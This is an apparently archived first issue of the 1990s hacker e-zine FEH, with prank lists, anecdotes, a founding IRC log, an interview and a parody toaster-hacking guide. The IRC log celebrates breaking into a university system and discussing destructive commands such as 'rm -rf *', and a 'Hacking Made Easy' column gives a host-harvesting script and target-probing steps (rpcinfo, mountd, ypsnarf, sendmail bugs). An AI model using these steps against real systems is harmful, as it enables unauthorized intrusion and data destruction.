  8. Call up the local noq and say things like [ed note: I wish I knew what a noq was]
    • "Do you Deliver?"
    • "Yeah, I'll have a pair on rye, hold the mayo"
    • "Umm yes is this the roadkill cafe? I just hit some guy with a Bell (or whatever your local telco is) Helmet and I think he would be tasty charred"
    • "Hey baby what are you wearing?"
    • "Are you wet?"
    • "I've got a big phat pole ready for ya.. standing straight up just for you"
    • Tape record them... turn them into .wavs or .aus and put them on your home page... this is something to do when your bored or when you are PATHETICALLY bored (YES I mean if your on a teleconference).

  9. Hack your school's net and make i automatically go to modem doom everytime someone clicks the left mouse button (hey its fun and it was only ONE of the reasons I had a remark "DANGER TO COMPUTERS" in my entry in my school's computer so it is pretty kosher
  10. SPELL CHECK this fucking article because I'M NOT GOING TO.
  11. If you have www access go to some of the following sites:
  12. [ed note: 12 was too lame for even FEH to print]
  13. Watch tv. Scary huh?
  14. Irc and go to #netsex as ILLFUCKU. notice the channel that you want some one for phone sex. see if you get kicked or invitations. heheh.
  15. Read this file (you must be bored d00d). [ed note: if you search for //, you will find the start of the next article]
  16. See how many of these things I type. [ed note: hint, then answer is 18]
  17. Add another to your count.(see previous item)
  18. EOF

YEAH IT WAS LAME.. YEAH IT SUCKED.. YEAH IM TYPING IN ALL CAPS.. SO
WHAT?.. I WAS BORED... ARE YOU SATISFIED rEdRAGON???? ( :) )
[ed note: pretty much]

The Infamous Tack Story by Hotrod

The story you are about to hear, it has been determined, has been spread by word of mouth to at least 5 states, and parts of Canada. Whereever I go, people who I have never seen before ask me about the tack story. I have no idea why this is the case - the story might have been funny once, but I'm really rather sick of it. My friends (and apparantly these people I don't know, who ask me about it) think this story is the funniest thing they've ever heard. I think they are nuts.

The following story is 100% true.
Dramatis Personae:

  • Myself (Hotrod)
  • Chris, A friend
  • Zafir, An acquaintance
  • [ed note: is he the pan flute dude?]

The Setting:

  • Junior High School, Massachusetts.
  • Lunchtime, 8th grade

Ok, here goes. It was a normal lunchtime, really. I had gotten in line to get the "Hot Lunch", which is the generic, "nutritionally balanced" meal. On this fateful day, the hot lunch was manicotti with meat sauce. A kid I knew, and had no reason to distrust, came up to me while I was in line and offered to sell me his hot lunch, without the milk. (Milk came with the hot lunch.) Of course, I'm thinking to myself "This kid must be stupid. He wants to sell me his hot lunch, which costs $1.30, for 50 cents, while keeping his milk, which he could have bought for 35 cents by itself. [ed note: a savings of -45 cents] I did know that this kid WAS stupid, however. So I bought the lunch and went to sit where I always sat, next to my friend Chris. [ed note: not erikb]
For a few minutes, everything was fine. I was eating and enjoying (as much as one can enjoy a school lunch, anyhow) my manicotti. Keep in mind, that manicotti is soft, it's something like lasagna. [ed note: i hope nobody from Italy is reading this] You don't really chew it a whole lot, you just squish it around in your mouth and swallow. Then it happened. I put the manicotti into my mouth. [ed note: that's not the climax of the story, he in fact put many pieces of manicotti in his mouth that day] I squished. I swallowed. I grunted. I yelled. Something Sharp! Words that will live in infamy in the minds of my friends.
[ed note: the words 'huuhuhuhhuhu' also live in infamy to his friends]

The dialogue went like this:

  • Me: [In a very hoarse voice] "Argh@!# Something Sharp! Something sharp in my throat!"
  • Chris: "What?" [ed note: still not goggans]
  • Me: "Argh it kills!"
  • Chris: "What is it?" [ed note: this time it is erikb saying it]
  • Me: [Grabbing Chris' chocolate milk and taking a swig] "I can feel it like grinding down my throat.. You know when you get like the sharp corner of a Dorito or something? God it kills! It feels like a staple or a tack or something!"
  • Chris: [Laughing a bit] "A tack? Zafir probably put a tack in it!"
  • [ed note: being a minor, Zafir was out of jail on his 18th birthday]

Anyhow, thats about it. It hurt going down. It never hurt again. To the best of my knowledge, I have not shit out the 'tack'. No proof has ever been found that there was a tack in my manicotti, [ed note: manicotti in general should not hurt to swallow] although Chris swears that he talked to Zafir, and Zafir admitted to it. I think Zafir has since been deported. I hope so, anyhow. Should I ever shit the tack out, it will be so noted in a future issue of FEH. [ed note: I have a pencil end in my right shoulder]

11. The Birth of FEH by SnoCrash

So ReDragon /msg's me today. He goes "write the history of FEH befor midnight tonight" (not in those exact words, and in all caps n stuph, but you get the point).

fEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEhFeHfEh 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ThE HiStOrY Of FeH -- PaRt 1 <<ThE BeGiNnInG>>
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
(FuXiN' ElEeT HaXoRs)
A BeDtImE TaLe By Da MaStUr Of DiSaStUr:
SnOcRaSh


Okay, enough with this AlTeRnAtInG CaPs crap. It makes my head hurt.
[ed note: my feelings exactly]
(DISCLAIMER: FOR ALL YOU KNOW, NONE OF THIS COULD BE TRUE. I AM TRYING TO REMEMBER WHAT HAPPENED AND MY MEMORY SUCKS AND I EXAGGERATE SO DEAL WITH IT) Well, it all started for me about a year ago. I was bored shitless as usual on a Sunday morning, and was checking out <name witheld>.edu. I had an IRC window open as well, as I almost always do. Here's the log from that fateful day (re-formatted a bit to make it more readable):
[ed note: whenever monumental history takes place on #hack, log it]

<SnoCrash> i found a system that still has the ftp -n bug!!!!!
<ReDragon> sunday afternoon is warez ftping days
[ed note: being as this was a sunday, ReD was probably still a bit drunk]
<SnoCrash> holy shit!!!
<SnoCrash> i feel sorry for the sysop
<SnoCrash> i'm gunna mail him and tell him
<SnoCrash> this is sad
<noxit> last root i haqued
<noxit> i left mail describing how to do it and how to fix it
<noxit> sad
<ReDragon> haha
<Okinawa> noxit; not me, I just rm /etc and let them figure it out
<SnoCrash> rm -rf *
<SnoCrash> ha
<SnoCrash> lame
<SnoCrash> well...
<SnoCrash> what should I do
<Okinawa> no, not /* but just /etc
<SnoCrash> im gunna change the banner explaining what to do
<Okinawa> Were all the configs are ;)
<ReDragon> if you dont rm the site, they will never learn how dangerous hackers can be and the importance of securing their site
<SnoCrash> Oki: i know
<SnoCrash> and rm every user
<SnoCrash> there's only 10 users
<Okinawa> put in the l0ck motd
<oof> red: gimme warez
[ed note: note oof's critical role in FEH's inception]
<SnoCrash> they all have empty home dirs anyway
<Okinawa> put in a ILF motd
<SnoCrash> cept for the standard shell shit
<ReDragon> oof: whatcha want
<ReDragon> put in a FEH motd <-- the first public mention of FEH
<noxit> ln -s /vmunix /etc/motd
<rS-449> noxit: haha
<loq> oki: if you rm /etc, where are ya gonna put the ILF motd?
<Okinawa> is there a FEH motd?
<grayarea> donut put in an ilf motd :)
<oof> red: i dunno
<grayarea> use feh :)
<SnoCrash> yeah
<ReDragon> i will release an official FEH motd later today
<SnoCrash> feh
<Okinawa> loq: true
<SnoCrash> I'll make up a temp one now
<Okinawa> grayarea: why not?
<SnoCrash> **Hacked by a FEHWB**
<SnoCrash> ha
<grayarea> cuz they r in my new issue and if anything is done in their name i will be visited
<loq> gray: dont you like being visited?
<loq> :)
<noxit> "visited"
<noxit> aliens of phedz?
<grayarea> and #hack has caused me more than enuf contact with feds for the year already :)
<noxit> s/of/or
<grayarea> loq: i hear they come at dawn. ewwww
<grayarea> loq: i prefer evening appointments
<loq> heh
<SnoCrash> if I put up a FEH motd, can I be a FEH?
<loq> mine come at 11pm
<ReDragon> Sco: you already are in FEH you moron
<SnoCrash> oh yea
[ed note: i actually said Sco, not sno... but he never realized it]

So there it was. I was in FEH.
I made a temporary FEH /etc/motd, call it FEH motd version .0000001b.
Here is how it looked:
---------HI!!! WELCOME TO <name witheld>, NOW OWNED BY FEH----------
[TODAY'S NEWS]
Your system has been hacked by a member of FEH... Fuxin Eleet Haxors. I am not particularly proud of this hack because it exploited an extremely old bug that was patched many years ago. I have left a file in the root directory called "how.to.fix.the.bugs.you.have" please read it and follow the directions in it on how to fix the bugs you have. I am very sure that your system has many bugs, judging from this and the version of sendmail you are running. Thank you for your time...
--- Anonymous member of FEH who just fuxored up your system real bad Not exactly beautiful, but it worked for the site it was placed on. ReD then created the FEH motd versions 1.0 and 1.1, which is located in this issue within the wopr hack.
[ed note: oof never got his warez, if you have any, please send him some]

12. An Interview with Dale Drew by ReDragon

[ed note: good to my word, this is completely unedited for content, only for formatting.]

ReD: will you do an interview for FEH issue #1?
d_d: I dont do interviews, sorry
ReD: just this once dale. only a few questions
ReD: its not like you've NEVER done an interview
ReD: dont even think of it as an interview, think of it as just answering a few questions where the answers get published
d_d: haha.. and the difference is?
ReD: well, you dont do interviews. but maybe you do published question and answer sessions.
ReD: so why dont you do interviews?
d_d: Youve got better things to do than interview me
ReD: when you let me interview you, you keep me out of trouble :)
ReD: so why dont you do interviews?
ReD: well
d_d: too many misquotes
ReD: pleez
ReD: i am not going to misquote you
ReD: so will you answer just a few questions for me
d_d: depends on the questions
ReD: are there any hackers that you particularly like or dislike?
d_d: No.
ReD: Do you think the people you are trying to bust care about learning about the phone system or are they just trying to make free phone calls?
d_d: There are to many LEGAL ways to learn about phone systems these days to put up with fraud.
ReD: So do you think 10 or 20 years ago some phreaking may have been justified in order to learn?
d_d: I never think that committing fraud is a justifiable way to learn anything.
ReD: Does it cost your company anything when a person makes a free phone call?
d_d: Making use of a service illegally that would otherwise be billed for certainly costs the company money
ReD: I understand there is a loss of income from the consumer since they are not paying, but is there any expense to the phone company for that call and if so can you estimate the cost?
d_d: I am not in phone fraud, so I wouldnt be able to estimate
ReD: So what is your job description?
d_d: Data Security
ReD: Can you expand on what that encompasses?
d_d: Later.. Ill be back
ReD: do you know when?
<d_d drops connection>

13. "Hacking Made Easy Using Scripts" by Seven Eleven

HacK1nG Mad3 EZ Uz1Ng Skr1PtZ Part I by Seven Eleven (711@sec.de)

Welcome to our new column, dear reader.

In the software industry, everything is getting easier - easier to use, easier to handle. The keywords are "Plug and Play", the new WinDos 95 and "Don't think but drive (on the information superhighway)".

Now everyone can get on the Internet, your grandfather, your 4 year old sister and even a coffee machine in Cambridge. There is no need to be smart, no need to know anything about computers, and no need to have a brain.

With more and more people on the net, more and more want to play around and learn about other systems by getting into them, formerly called "Hacking".

To make those tries possible, we are bringing you easy to use and always working step by step instructions and scripts!

There are 3 major steps to succeed, which are similar to hitting on a girl:

  1. Get a list of all visible targets
  2. Check if there is an easy way of scoring
  3. Try gettin' into!

Today we will take a look at 1) and 2). 3) will follow in the next issue.

Since all most newsbies know about is IRC, we will try to get a list of visible targets through IRC!

Here is our great script:

------------------ cut here --------------------------- cut here -------- 

# IRC Host Leecher 1.0 by Seven Eleven (711@sec.de)
#
# This little one liner gets you all hosts that are currently on IRC
# and sorts the output nicely.
#
# This is especially nice if you plan to use our Host Checker.
#
#
# All you have to do is this:
#
# Start IRC
# /SET LOGFILE rawhosts
# /SET LOG ON
# /WHO **
# /SET LOG OFF
# /QUIT
# $ <Name_of_this_Script> rawhosts > outputfile
#
# Have Fun! :-)
#
#
#!/bin/sh
cat $1 | awk '{print $4}' | awk -F@ '{print $2}' | sort | uniq


------------ cut here --------------------- cut here --------------------


Also try to use an old or modified server that won't kill you when you list too many names! It used to be easier some months ago, but you should still be lucky! After all, it's good if not too many Lamers get as far as you, isn't it? :-)

If everything went fine, you have a wonderfully nice list of hostnames.

If you want to do it the elite way, try writing your own elite script, executing a command with each of the hostnames. Possibilities include:

  • Check with rpcinfo -p which services are available. Some might be vulnerable!
  • One vulnerable daemon is mountd. Figure out yourself how to probe it! (First Exercise!)
  • Use ypx or ypsnarf to test their ypserver's security. If it's open, either get in or --> social engineer the admin by telling him bugs (lame!)
  • Check with the 31337 SATAN!@# (available at a WaR3z near you!)
  • Try some sendmail bugs.

If the above ways sound to hard for you, do it the easy way. Social engineer the administrators!

  • Sending mail to root@hostname requesting for an account (Be prepared for many flames and your old account to be shut down)

If you should surprisingly be successful, drop me a mail and tell me about your story! If not, stay tuned for the next issue of...
HacK1nG Mad3 EZ Uz1Ng Skr1PtZ!@#

14. How to Hack A Toaster Oven by bl0ke

HacKZoRiNG Ah ToaSTeR OOOHHVeNN)#(*%)(*% 
========================================
Author:
bl0ke:#$%HS@#H:dat niggah bl0ke:/home/bl0ke:/bin/tcsh
(k)opywr0ngeded 1995


+--------------------------------------------------------------+
| [=ThiS iS THu DEFiNITiVE GuIDE TeW HAxORiNG A ToaSTER)#(%*=] |
+--------------------------------------------------------------+
****************************************************************
*******The Author of this text takes no responsibility for the**
*******actions that are performed on toaster ovens to try and***
*******obtain an access which the superuser does not want a ****
*******regular (l)user to have access to.***********************
*******The author also notes that this text is allowed only*****
*******to be used as a .motd after the site has been hax0red.***
****************************************************************

^^^--------NoTiCE MuH DOpE K-RAD KiLLa AK-AkII SKeeiLLZ()*#$


/*

This text covers the basics of hacking the Proctor & Silex
MoDEL:0225 SERiES:b4588 TyPe:02

This specific toaster handels 120 Volts A.C. *ONLY* 1400 WATTS

*/

CoNNECTiNG

When CoNNECTiNG TeW SuCH A ToaSTER On ThU iNeT YeW WiLL b ProMPtED
4 aH LoGiN AnD PaSSwErD. ex:(This is a capture of a login.)

+-------------------+ 
| PROCTOR & SILEX |
| M:0225 |
| S:b4588 |
| T:02 |
+-------------------+


LaHGiN: bageL-n-KreAM/CheZE
PaSSWeRD: *************************************


LaHGiNN GRaNTiD
***************
------------------------------------------------------------

P&S VeRSiON 666.9.MuRRY_LenDER(*REVISION*)

------------------------------------------------------------

login on tty[tOaST]
last login from BAGeL_BaKERY.COM on tty[ChEZe] at 6:43a.m.

:/etc/motd not found

  1. OFF
  2. ToAsT StART
  3. BRoWN
  4. BuRNT
  5. LiGHT
  6. UNiX TyPE SheLL ENViRONMEnT

If YeW GhET THiS YEW ArE COOL)(#*$ Ok NoW CHEwZe No. SiX. AND RuN NE Of ThU 8LGMz. They WeRK. DeW NoT WeRRIE BoUT WhUT THU 8lgM SaYZ iT WiLL STiLL WeRK oN ThIS SYSTEM. AlLLL THu 8LGMz DeW()#*%&( ThE OtHER CoMMANDs R NoT ImPOrTaNT.

SoME NeaT-O ThINGS. YeW CaN TaP the /dev/ToaST-N-CheEZe. YeW CaN FiND A FeW PRoGRAMs ThAT ArE GeWD FeR ThIS SuCH SYTeMM.

ftp:ftp.elite.warez.feh.OrG

/pub/hax0ring_WaReZ/ToAsteR_HaxoRiNG_WaREZ

P&S_ToAsTeR_ReWTKiT.TaR.GZ            -RooTKiT FeR ThiS TYPE o ToaSTER 
PSNiFF.GZ -/dev/ToasT-N-CheEZe SniFFAH


SoME DeFUlTZ:
Login:Password
++++++++++++++
bageL-n-KreAM/CheZE:YuMMY
PoPALeNDER:STiNKY_Joo
POaCHeD_EGZ:HooKGNOZe
root:root
lpd:lpd
guest:hymienotyew


ThIS CoNCLuDES ThU DoPEST ARTiCLE On THu FACe O ThU PlaNET)(#*%)(*%
I WooD LiKE TeW GREaT:
Murray_L of the BagelBoyz o HymieTowN.
BuRnT-T of The BuRNT ToasT PoSSE.
AnD ReDRAGoN N ShIT.

PeSE OuT


And on that uplifting note, the first issue of FEH is complete....
Thanks for reading.

- FEH

--
"Your information is mine for free. But everything I can grab is secret unless you have something I want which can't be free-loaded, stolen or found somewhere else." - George C. Smith, The Virus Creation Labs

next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT